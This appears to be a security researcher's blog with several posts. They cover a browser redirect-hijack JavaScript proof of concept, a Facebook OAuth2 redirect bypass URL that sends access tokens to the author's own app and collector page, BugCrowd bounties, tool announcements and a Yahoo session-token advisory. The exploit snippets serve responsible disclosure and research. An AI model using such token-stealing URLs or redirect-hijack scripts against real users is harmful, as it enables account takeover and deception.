IE/Firefox Redirection Issue – FB Oauth2 Bypass – BugCrowd

To keep a record of the little things I have done since my last blog post:

1- IE/Firefox – Page Redirection Hijack

Several weeks ago, I reported an interesting PoC via my Twitter in which I had created a web page that stops Firefox and IE browsers to redirect users to their intended destination even if they had typed it directly in the address bar: https://twitter.com/irsdl/status/294239415428067329

This issue is still unpatched in the latest versions of these browsers (March 2013). Unfortunately, some advert companies are currently exploiting this issue as well. I have already reported it to Mozilla: https://bugzilla.mozilla.org/show_bug.cgi?id=839470

Example 1: No Redirection Ever: http://0me.me/demo/mozilla/firefox/UnRedirectablePage.html

Here is the Javascript code that does this:

window.onbeforeunload = function(){

      //Unredirectable Page

      setTimeout("window.location=document.location;alert('delay by alert');",0);

}

Example 2: This always redirects you to secproject.com:   http://0me.me/demo/mozilla/firefox/RedirectToSecProject.html

Here is the Javascript code that does this:

window.onbeforeunload = function(){

//Unredirectable Page

setTimeout("window.location='http://www.secproject.com';alert('delay by alert');",0);

}

2- Facebook OAuth2 Bypass

Facebook OAuth2 yet another redirection bypass! I only found one issue which was very similar to what Nir Goldshlager (www.nirgoldshlager.com) and Egor Homakov (homakov.blogspot.co.uk) had reported to Facebook. I highly recommend their blog posts about Facebook Oauth2 for reading and learning!

Here is what I have found in Facebook:

The following URL could send your sessions to attacker’s domain and he could hijack your OAuth token: Link


https://www.facebook.com/dialog/oauth?client_id=210831918949520&response_type=token&scope=,,,,&redirect_uri=https://apps.facebook.com/candycrush1//////////%23/testrdirsdl/%2523

It used to work in all the browsers. However, you needed to find an authorised Facebook app in order to be able to exploit this issue.

A short description:

- “/////” in the URL -> to bypass IE problem with Facebook redirection

- “candycrush1” -> to redirect the user to a normal user page instead of candycrush game! “https://apps.facebook.com/candy.crush1” takes you to a user page instead of an App!

- “%2523” and “%23” -> to remove # in the final URL and send the token directly in the URL.

The result of loading that URL was:

http://apps.facebook.com/testrdirsdl/&access_token=BlahBlahBlah&expires_in=5033

in which “testrdirsdl” is my app that can store the tokens in “http://www.secproject.com/demo/showmyinfo.php” (it does not have logging functionality at the moment!)

3- BugCrowd!

I attended several BugCrowd.com bounties and gladly received $$$ for private and public bounties! I liked the charity ones as well :-)

If you want to test live and different websites without having legal obligations (well, I hope they can provide us with a signed document per project very soon!), it is the right place. I recommend it to the people who want to have fun and increase their web app. security testing skills.

Unfortunately, the recent bounties from BugCrowd did not have fair prizes and I guess it is because of the companies budgets. Moreover, we still need them to come up with the hall of fame table! As soon as they sort these out, I will become more interested!

That’s it for now. Thanks for your time.

Burp Suite Beautifier Extension

I have updated my project section with a small project “Burp Suite Beautifier Extension”: http://soroush.secproject.com/blog/projects/burp-suite-beautifier/
Please let me know your opinion if you have used it. You can always send me your messages via Twitter “@irsdl”

“Advisories” has been updated

I am quite busy these days and I cannot finish my articles or even write about the vulnerabilities in details. Moreover, I need to update my “Excel Advanced Search” Add-In to be compatible with Office 2010, and also I need to put my “Secure Text Steganography Techniques by using Markov Chain” in this blog in near future [this project is actually from summer 2008].

However, I have updated the “Advisories” section with my new reported issues in Some Mozilla Products, IIS, and Adobe Reader/Acrobat.

I hope I can find more free time soon :-)

Excel Advanced Search Add-In Application

This is a handy Excel Add-In which helps you to search/replace inside of your excel files better and simpler. The best thing about this Add-In is that it’s free and open source. Therefore, you can simply customize it for your needs.
Unfortunately the built-in search function of Microsoft Excel is too weak, and it cannot even do the simple tasks. Moreover, other useful search applications that can search/replace inside of Excel files are not free. As a result, I decided to write this tool in order to have more power in Excel searching process.
As this application is quite new, it is not free of fault. Please let me know if you find any issue. I will try to update this section in future in case of having a new release for this application.

Features

- Accepting Regular Expressions
- Supporting Inclusion or Exclusion
- Case sensitivity option
- Selecting unique results option
- Ability to export the results to an Excel file
- Searching in multiple files at the same time
- Detecting opened Workbooks
- Flexible result view
- Having search and replace functionality
- Having Formula Schema option (currently it just have credit card number checker)
- Having logbook to keep the previous keywords
- Capable to search inside of different versions of Excel files

Download

Version: 2.6.1
Date: 14 August 2010
Author: Soroush Dalili
Price: Free and open source!
Download Link: http://soroush.secproject.com/downloadable/excel_search_app.zip
Download Link (Mirror): http://www.0me.me/files/soroush.secproject.com/excel_search_app.zip
URL: http://soroush.secproject.com/blog/projects/exceladvancedsearchapplication/

Screen Shots:

Clicking on an offline message link in Yahoo Messenger can lead to Session Hijacking

Clicking on an offline message link in Yahoo Messenger is the same as clicking on an unknown link in your yahoo mail! In fact, Yahoo authenticates you before opening the destination link by using this URL:
http://login.yahoo.com/config/reset_cookies_token?.token=[Your Valid Token]&.done=[Destination Link]
Note 1: Fortunately, the destination cannot read your valid token by using referrer section of the HTTP request. However, this valid token is stored at your browser’s history, and if you do not sign-out from Yahoo, it can be dangerous.
Now you may ask why clicking on link while you are authenticating in yahoo is dangerous:
There are a lot of Cross Site Scripting (XSS) vulnerabilities in yahoo.com sub-domains. Some of these XSS attacks are simply detectable by IE8 and/or NoScript (a recommended Mozilla Firefox Add-on), and some aren’t. For example, some of Asian sub-domains of yahoo.com still have SQL Injection. And it is simply possible to cover an XSS attack by using a simple SQL Injection. Moreover, there are some points with different encoded inputs such as UTF-7 or Base64 which can be used to bypass the client-side protections. There are some other types as well that I do not want to talk about them here (I do not want to teach how to find XSS in this post). Some examples: http://www.xssed.com/search?key=yahoo.com

I’m scared. What should I do then?
1- Only open your email in private browsing mode.
2- Do not click on unknown links which are sent to you via offline messages or your email. If you want to open that link, simply open another private browsing and copy/paste that link there to open it. Moreover, you can open those links in a different browser from your open yahoo mail or your default browser.
3- Please always look at the link destination and do not trust its name. For example this link will redirect you to google.com instead of: http://www.yahoo.com/.

I clicked on a link by mistake. What should I do?
1- If you have knowledge of web security, you can open that link while monitoring your browser by using a local proxy such as Fiddler or BurpSuite. You will see if there is any request to yahoo.com or any other domains then.
2- If you are not sure about what you have done, you MUST change your password immediately. This is the only way that you can protect yourself. Even decreasing the life time of your Yahoo session (Cookie) cannot solve your problem.

What will happen if I don’t care?
1- Attackers will have access to your Yahoo.com account without knowing your password. Fortunately, they cannot change your password directly (they still can use forgot password section).